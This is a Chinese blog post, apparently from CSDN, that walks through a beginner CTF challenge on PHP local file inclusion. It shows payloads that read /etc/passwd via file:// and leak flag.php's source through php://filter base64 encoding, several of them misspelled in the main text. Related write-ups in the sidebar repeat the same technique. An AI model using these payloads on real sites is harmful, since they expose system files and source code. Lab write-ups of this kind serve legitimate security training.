BUUCTF[ACTF2020新生赛]Include

最新推荐文章于 2023-11-02 16:19:26 发布
最新推荐文章于 2023-11-02 16:19:26 发布
阅读量196 收藏
点赞数
分类专栏: CTF日记 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/116447635
版权

文件包含。

点击tips

试了一下伪协议:http://310042cb-a5df-4a70-bf9d-528b99228398.node3.buuoj.cn/?file=file:///etc/passwd

 

出结果了,好像是考伪协议,我们试着找找Flag。

由于是PHP文件,我们使用php的文件包含伪协议:

php://伪协议,主要为php://input与php://filter

php://input:将POST输入流当做PHP代码执行。其只受allow_url_include参数的影响,allow_url_fopen开关与此伪协议无关。

php://fiter:不受allow_url_fopen 与 allow_url_include参数的影响。

我们测试:

http://310042cb-a5df-4a70-bf9d-528b99228398.node3.buuoj.cn/?file=php://input/phpinfo()

发现input不可用

我们试试:

http://37c7384e-607b-4ece-9abc-0ce4b461b219.node3.buuoj.cn/?file=php://flter/resource=flag.php

没有结果。

所以我们试试常用读取文件的方法:

http://310042cb-a5df-4a70-bf9d-528b99228398.node3.buuoj.cn/?file=php://flter/read=convert.base64-encode/resouce=flag.php

读取base64加密后的数据

进行解密得:

得到flag!

carefree798
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
BUUCTF[ACTF2020 新生]Include
GUOGUO的博客
04-19 2698
BUUCTF[ACTF2020 新生]Include 一进去之后看到如下页面: 点进去之后看到: 分别在这两个页面下查看源码,一无所获。 但是我们在第一页的源代码里注意到: 一般来说,在ctf里,命名为flag的文件里面就包含着flag,但是我们查无所获,为什么呢? 因为文件包含有一个特性,就是对于被包含的文件,代码会直接执行,不会显示,而非代码会直接显示出来,所以,对于这样的情况,我们可以把文件编码为不可以被执行的内容,就可以直接显示出来了, 考虑使用php伪协议,构造payload: ?file=
BUUCTF之[ACTF2020 新生]Include
weixin_44632787的博客
06-13 425
BUUCTF之[ACTF2020 新生]Include 启动项目,进入到我们的挑战页面 这个有个tips链接,点开它 发现并没有什么可用的信息,然后试试右键打开源代码和访问robots.txt协议都没有看到什么特别的信息。然后就开始想是不是该用dirsearch扫描一下这个网址看看可不可以扫描出什么来。但是又返回到题目去,看到了Include这个字眼。就想起了,这个题目可能是和文件包含相关。。。 打开火狐的Hackbar,导入链接emmmmmmmmmm 好的,那么现在开始输入文件包含里经常用到的方
Buuctf-Web-[ACTF2020 新生]Include
御七彩虹猫
05-13 486
Buuctf-Web-[ACTF2020 新生]Include
BUUCTF————[ACTF2020 新生]Include
最新发布
qq_61579604的博客
11-02 123
主要有四种:字符串过滤器,转换过滤器,压缩过滤器,加密过滤器。filter里可以用一或多个过滤器(中间用|隔开),这也为解题提供了多种方法,灵活运用过滤器是解题的关键。php://filter与包含函数结合时,php://filter流会被当作php文件执行。是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行。file=flag.php猜测是一个文件包含漏洞。
BUUCTF | ACTF2020新生 include
weixin_47982238的博客
08-29 267
http://ee2ad130-7749-4957-b7b2-838f88b2bdd7.node3.buuoj.cn/ 其实看题目include我就先猜测也许是文件包含??? 点击tips,然后看到url栏如下图 看到?file=flag.php十有八九就是文件包含啦, 于是构造payload读取文件源码: ?file=php://filter/read=convert.base64-encode/resource=flag.php 看到一串base64编码,拿去解码成功拿到
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方是一种创新的LED显示技术,它通过三维立体排列的LED灯珠,形成一个透明、可编程的灯光展示装置。这种技术广泛应用于艺术展览、舞台效果、广告展示等领域,因其独特的视觉效果和高度的可定制性而备受青睐。...
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
(PPJEmailPicker *) createAutoCompleteFieldWithFrame:( CGRect )frame{PPJEmailPicker * actf = [[PPJEmailPicker alloc ] initWithFrame: frame];actf. pickerDelegate = self;actf. possibleStrings = [...
fanuc函数翻译对比.doc
06-07
FANUC函数提供了多种控制轴和主轴相关的函数,例如`cnc_actf`函数用于读取实际轴进给速度,而`cnc_absolute`函数用于读取轴绝对位置。这些函数可以帮助开发者更好地控制和操作机床的控制轴和主轴。 机床状态函数 ...
focas2接口中文文档
07-28
1. `cnc_actf`:读取实际轴进给率(F),返回实际轴进给率的值。 2. `cnc_absolute`:读取绝对轴位置,返回绝对轴位置的值。 3. `cnc_absolute2`:读取绝对轴位置 2,返回绝对轴位置 2 的值。 4. `cnc_machine`:...
eclips3.7 汉化包
10-05
BabelLanguagePack-technology.actf-zh_3.7.0.v20110723043401.zip (4.46%) BabelLanguagePack-technology.bpel-zh_3.7.0.v20110723043401.zip (21.06%) BabelLanguagePack-technology.egit-zh_3.7.0.v...
buuctf [ACTF2020 新生]Include
Kavint的博客
03-03 225
php伪协议,将flag.php的内容通过base64加密后读出来。注意到URL后面多了?file=flag.php改成如下。根据题目的include,应该是文件包含题目。尝试一下php伪协议读文件。
buuctf [ACTF2020 新生]Include 1
Recyvan的博客
10-15 940
[ACTF2020 新生]Include 1
BUUCTF-[ACTF2020 新生]Include 1 write up
m0_62851980的博客
04-05 1644
先打开靶机, ctrl+u查看一下页面源代码: “?file=flag.php”表示这里应该有文件包含漏洞 ,页面调用了include语句,那么我们使用php伪协议中的php://filter php://filter可以获取指定文件源码。当它与include函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取。 php://filter可以使用不同的参数来达到不同的作用: resource(要过滤的数据流):必写.
BUUCTF WEB ACTF2020 新生 Include
Ethan552525的博客
07-19 466
题目: 解题: 1:点击tips 2:F12查看源码 什么也没有。 3:文件包含漏洞 根据url:http://588343f8-9c53-4080-b98f-81c243df6870.node4.buuoj.cn/?file=flag.php 和题目“ACTF2020 新生 Include”,可猜测为Include文件包含漏洞。可以用php://filter协议来查看源文件内容;构造:file=php://filter...
BUUCTF】 [ACTF2020 新生]Include
aoao331198的博客
02-14 6367
点进题目有个‘tips’链接,点击 根据url中的flag.php和题目名称的暗示,应该能想到是文件包含,flag在flag.php中,于是想到利用PHP伪协议 构造payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php 于是获得页面的base64加密内容,解密一下即可 ...
buuctf ACTF2020 Include
09-16
根据提供的引用内容,buuctf ACTF2020Include功能可能存在文件包含漏洞。通过将URL中的参数修改为"?file=php://filter/convert.base64-encode/resource=flag.php",可以尝试读取flag.php文件并将其内容以Base64...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值